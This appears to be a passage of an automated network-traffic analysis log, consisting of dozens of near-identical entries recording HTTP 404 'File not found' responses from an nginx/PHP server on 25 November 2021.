        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:09 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:09 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:10 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:10 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:11 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:11 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:12 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:12 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:13 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:13 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:14 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:14 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:15 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:15 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:16 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:16 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:17 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:17 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:18 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:18 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:19 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:19 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:20 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:20 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:21 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:21 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:22 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:22 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:23 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:23 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:24 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:24 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:25 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:25 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:26 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:26 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:27 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:27 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:28 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:28 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:29 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:29 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:30 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:30 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:31 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:31 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:32 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:32 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:33 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:33 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:34 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:34 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:35 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:35 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:36 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:36 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:37 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:37 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:38 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:38 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:39 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:39 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:40 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:40 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:41 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:41 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:42 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:42 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
